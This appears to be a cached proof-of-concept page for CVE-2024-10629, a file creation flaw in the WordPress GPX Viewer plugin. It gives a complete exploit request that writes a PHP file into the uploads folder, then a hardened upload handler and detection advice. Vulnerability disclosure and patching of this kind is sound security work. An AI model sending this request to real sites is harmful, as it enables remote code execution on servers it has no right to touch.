POC details: 85250d68d01cc3857182462834438394477abc07

Source
Related vulnerability
Title: WordPress plugin GPX Viewer security vulnerability (CVE-2024-10629)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP; it lets users set up personal blog sites on servers running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin GPX Viewer versions 2.2.8 and earlier contain a security vulnerability that stems from a missing capability check and missing file type validation in the gpxv_file_upload function.
Description
GPX Viewer <= 2.2.8 - Authenticated (Subscriber+) Arbitrary File Creation
Introduction
# CVE-2024-10629
GPX Viewer <= 2.2.8 - Authenticated (Subscriber+) Arbitrary File Creation

# Description:
The GPX Viewer plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check and file type validation in the gpxv_file_upload() function in all versions up to, and including, 2.2.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary files on the affected site's server which may make remote code execution possible.


```
Published: 2024-11-12 13:21:00
CVE: CVE-2024-10629
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: gpx-viewer
```

POC
---

Login as a standard user

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=gpx_admin
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
Origin: http://kubernetes.docker.internal
Connection: keep-alive
Cookie: tm_member=172.21.0.1; wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1731579764%7CMtKoW3f233d5qnISbYVUXr4c22ixG9QMcdHzWXyvU5o%7C2d7486450bf41812303a58d1fbafe518ef19b8073d4e664c09bf94377ca17fe7; _delighted_web={%22FutSOUgy5edCcTk9%22:{%22_delighted_fst%22:{%22t%22:%221694595337803%22}}}; mailpoet_page_view=%7B%22timestamp%22%3A1727811617%7D; wordpress_admin_logged_in=1; LUMISESESSID=TE3CYBG1VFQEDZU5QXW7; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; tk_ai=woo%3A4etnnSH4LBZewXIFkJECnLd0; PHPSESSID=786ef110eb080f5686818c346edde8d3; wp-settings-time-4=1731070503; sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-08%2017%3A21%3A02%7C%7C%7Cep%3Dhttp%3A%2F%2Fkubernetes.docker.internal%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-08%2017%3A21%3A02%7C%7C%7Cep%3Dhttp%3A%2F%2Fkubernetes.docker.internal%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D5%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010.15%3B%20rv%3A132.0%29%20Gecko%2F20100101%20Firefox%2F132.0; woocommerce_items_in_cart=1; woocommerce_cart_hash=6d1d20e1fd5e4f4f3846eea4a6c448f3; hashcaf=#layoutstab; hashcafsub=post-layout; wp_woocommerce_session_e2df32a6c3e7076dd7dc7d3f3fec39aa=1%7C%7C1731498720%7C%7C1731495120%7C%7C2c258c1ff57491a59c854505530207f7; 
wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1731579764%7CMtKoW3f233d5qnISbYVUXr4c22ixG9QMcdHzWXyvU5o%7C7e8c9e15242ca5cf7bc38fb82a5a51c0b8024a364cc5b62472935180754b64df; wp-settings-1=m02pzb9ihm%3Dundefined%26libraryContent%3Dbrowse; wp-settings-time-1=1731406964
Upgrade-Insecure-Requests: 1
Priority: u=0, i

action=gpxv_file_upload&category=uncategorized&filename=example.php&gpx=%3c%3fphp%20phpinfo()%3b%3f%3e&update=false&clean=false
```

Goes to `/wp-content/uploads/gpx/uncategorized/example.php`
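The advisory attributes the issue to a missing capability check and missing file type validation in gpxv_file_upload(), and the PoC shows a low-privileged user getting example.php written under wp-content/uploads/gpx/. As an added illustration, not the GPX Viewer plugin's own code, the handler below shows what those two checks look like in a WordPress AJAX handler. The hook and the action name gpxv_file_upload come from the advisory; the function name, the manage_options capability, the nonce action name and the directory layout are assumptions.

```php
<?php
// Added illustrative example, not code from the GPX Viewer plugin.
// The "wp_ajax_gpxv_file_upload" hook name is from the advisory; the
// callback name, capability, nonce action and paths are assumptions.

add_action( 'wp_ajax_gpxv_file_upload', 'example_hardened_gpxv_file_upload' );

function example_hardened_gpxv_file_upload() {
    // 1. Capability check: only users allowed to manage the plugin may
    //    upload. A Subscriber lacks 'manage_options', so the PoC request
    //    is rejected here. wp_send_json_error() ends the request.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // CSRF protection: the request must carry a nonce for this action
    // (hypothetical nonce action name 'gpxv_upload_nonce').
    check_ajax_referer( 'gpxv_upload_nonce', 'nonce' );

    // 2. File type validation: drop path components, then allow only a
    //    .gpx extension so a name like "example.php" can never be written.
    //    sanitize_file_name() also neutralises multi-extension names.
    $filename = sanitize_file_name( wp_unslash( $_POST['filename'] ?? '' ) );
    $filename = basename( $filename );
    $ext      = strtolower( pathinfo( $filename, PATHINFO_EXTENSION ) );
    if ( '' === $filename || 'gpx' !== $ext ) {
        wp_send_json_error( 'only .gpx files are accepted', 400 );
    }

    // Restrict the category to a slug so it cannot escape the upload dir.
    $category = sanitize_key( wp_unslash( $_POST['category'] ?? 'uncategorized' ) );
    if ( '' === $category ) {
        $category = 'uncategorized';
    }

    // Content check: the body must parse as XML with a <gpx> root element.
    // LIBXML_NONET keeps the parser from fetching remote resources.
    $gpx  = wp_unslash( $_POST['gpx'] ?? '' );
    $prev = libxml_use_internal_errors( true );
    $xml  = simplexml_load_string( $gpx, 'SimpleXMLElement', LIBXML_NONET );
    libxml_use_internal_errors( $prev );
    if ( false === $xml || 'gpx' !== $xml->getName() ) {
        wp_send_json_error( 'payload is not a GPX document', 400 );
    }

    // Write inside the uploads directory only, under the validated name.
    $upload = wp_upload_dir();
    $dir    = trailingslashit( $upload['basedir'] ) . 'gpx/' . $category;
    if ( ! wp_mkdir_p( $dir ) ) {
        wp_send_json_error( 'could not create upload directory', 500 );
    }

    $path = $dir . '/' . $filename;
    if ( false === file_put_contents( $path, $gpx ) ) {
        wp_send_json_error( 'write failed', 500 );
    }

    wp_send_json_success( array( 'file' => $filename, 'category' => $category ) );
}
```

Each failed check stops the handler because wp_send_json_error() calls wp_die(). The extension check is what blocks the PoC's example.php; as defence in depth, the uploads directory should also be configured so the web server never executes scripts from it. For detection, the PoC request stands out in access or WAF logs as a POST to admin-ajax.php with action=gpxv_file_upload and a filename parameter whose extension is not .gpx.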
File snapshot

```
[4.0K] /data/pocs/85250d68d01cc3857182462834438394477abc07
└── [3.5K] README.md

0 directories, 1 file
```
Cached for you by the Shenlong bot
Notes
    1. It is recommended to access the POC via the source link first.
    2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.